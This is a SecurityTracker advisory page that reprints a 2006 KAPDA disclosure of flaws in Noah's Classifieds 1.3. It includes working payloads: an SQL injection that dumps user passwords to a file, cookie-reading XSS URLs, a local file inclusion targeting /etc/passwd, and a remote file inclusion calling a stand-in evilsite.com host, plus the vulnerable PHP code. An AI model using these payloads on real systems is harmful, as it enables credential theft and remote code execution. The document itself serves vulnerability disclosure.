SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   Noahs Classifieds Vendors:   PhpOutsourcing
Noah's Classifieds Has Multiple Bugs That Let Remote Users Include and Execute Arbitrary Code, Inject SQL Commands, and Conduct Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1015667
SecurityTracker URL:  http://securitytracker.com/id/1015667
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Feb 23 2006
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Exploit Included:  Yes  
Version(s): 1.3 and prior versions
Description:   A vulnerability was reported in Noah's Classifieds. A remote user can inject SQL commands, conduct cross-site scripting attacks, and execute arbitrary code. A remote user can also determine the installation path.

The software does not properly validate user-supplied input. A remote user can supply specially crafted HTTP POST request values to execute SQL commands on the underlying database.

A demonstration exploit value for the search module is provided:

kapda%')))/**/UNION/**/SELECT/**/1,1,1,name,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,password/**/INTO/**/OUTFILE/**/'/installation_path/lang/result.text'/**/FROM/**/classifieds_classifiedsuser#

The software does not properly filter HTML code from user-supplied input in the 'inf' and 'upperTemplate' parameters before displaying the input. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Noah's Classifieds software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Some demonstration exploit URLs are provided:

http://[target]/classifieds/index.php?inf=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/classifieds/index.php?upperTemplate=%3Cscript%3Ealert(document.cookie)%3C/script%3E

If magic_quotes_gpc is disabled, a remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a file on the target system. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/classifieds/index.php?otherTemplate=/../../../etc/passwd%00

If register_globals is enabled, a remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided

http://example.com/classifieds/index.php?lowerTemplate=http://evilsite.com/evilfile.php

A remote user can directly access the '/classifieds/gorum/category.php' script to determine the installation path.

The original advisory is available at:

http://www.kapda.ir/advisory-268.html
http://irannetjob.com/content/view/198/28/ (in Farsi)

trueend5 from Security Science Researchers Institute Of Iran discovered this vulnerability.

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the Noah's Classifieds software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user can execute SQL commands on the underlying database.

A remote user can determine the installation path.

Solution:   No solution was available at the time of this entry.

The vendor is no longer supporting the product and does not plan to issue a fix.

Vendor URL:  classifieds.phpoutsourcing.com (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [KAPDA::#29]Noah's classifieds multiple vulnerabilities


KAPDA New advisory

Vendor: http://classifieds.phpoutsourcing.com
Vulnerable: Noah`s classifieds 1.3 and below
(classifieds component for mambo also may be affected)
Bug: Path Disclosure,Sql Injection,XSS,Local file
inclusion,Remote code execution    
Exploitation: Remote with browser
Exploit:available

Description:
--------------------
Noah' Classifieds is a general purpose application
that allows you to set up as many ad categories as you
want specifying custom fields for each of them.



Vulnerabilities:
--------------------

Path disclosure (direct access to include files)

http://example.com/classifieds/gorum/category.php

--------------------------
--------------------------

Sql Injection: (search tool, HTTP method:POST,
condition: mysql user with file privilege)

kapda%')))/**/UNION/**/SELECT/**/1,1,1,name,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,password/**/INTO/**/OUTFILE/**/'/installation_path/lang/result.text'/**/FROM/**/classifieds_classifiedsuser#

--------------------------
--------------------------

Cross site scripting

1-
http://example.com/classifieds/index.php?inf=%3Cscript%3Ealert(document.cookie)%3C/script%3E

/gorum/gorumlib.php
if( isset($HTTP_GET_VARS["inf"]) )
$infoText=$HTTP_GET_VARS["inf"];
    $sApp=$init->showApp();
    $s.=$globHtmlHead;//fontos, hogy felulirhato
legyen az app-ban

---
2-
http://example.com/classifieds/index.php?upperTemplate=%3Cscript%3Ealert(document.cookie)%3C/script%3E
(condition:rgister_globals=On)

--------------------------
--------------------------

Local file inclusion (condition: magic_quotes_gpc=Off
For none php files )

http://example.com/classifieds/index.php?otherTemplate=/../../../etc/passwd%00

/include.php
if (isset($otherTemplate)) {
    include("./template$otherTemplate.php");
}
else include("./template.php");

--------------------------
--------------------------

Remote code execution (condition: register_globals=On)

http://example.com/classifieds/index.php?lowerTemplate=http://evilsite.com/evilfile.php


/gorum/constants.php
if (!isset($upperTemplate)) $upperTemplate =
"<body>\n";
if (!isset($lowerTemplate)) $lowerTemplate =
"</body>";



/gorum/gorumlib.php
if (ereg("\.php$",$upperTemplate)) {//just check
        $ret=@fopen($upperTemplate,"r");
        if (!$ret) {
            $infoText =
sprintf($lll["incl_header_err"],$upperTemplate);
        }
        @fclose($f);
    }
    if (ereg("\.php$",$lowerTemplate)) {//just check
        $ret=@fopen($lowerTemplate,"r");
        if (!$ret) {
            if (!isset($infoText)) $infoText="";
           
$infoText.="<br>".sprintf($lll["incl_footer_err"],$lowerTemplate);
        }
        @fclose($f);
    }
.
.
.
$upperTemplate=trim($upperTemplate);
    if (ereg("\.php$",$upperTemplate)) {
        $ret=@include($upperTemplate);
    }
    else $s.="$upperTemplate\n";
    $lowerTemplate=trim($lowerTemplate);

    $s.=$sApp;
    if (ereg("\.php$",$lowerTemplate))
$ret=@include($lowerTemplate);
    else $s.="$lowerTemplate\n";

}

More details with Exploit
---------
http://www.kapda.ir/advisory-268.html
In Farsi: http://irannetjob.com/content/view/198/28/

Solution:
---------
There is no vendor supplied patch for this issue.

>From Vendor`s website:
"Currently, we are completely overloaded with our
running projects,
and we don't have enough time to deal with our free
products.
The further development and support of Noah's
Classifieds is therefore suspended.
Thank you for the understanding and please forgive us 
that we don't responding to the emails."



Credit :
---------
Discovered & released by trueend5 (trueend5 kapda ir)
Security Science Researchers Institute Of Iran
[http://www.KAPDA.ir]


__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC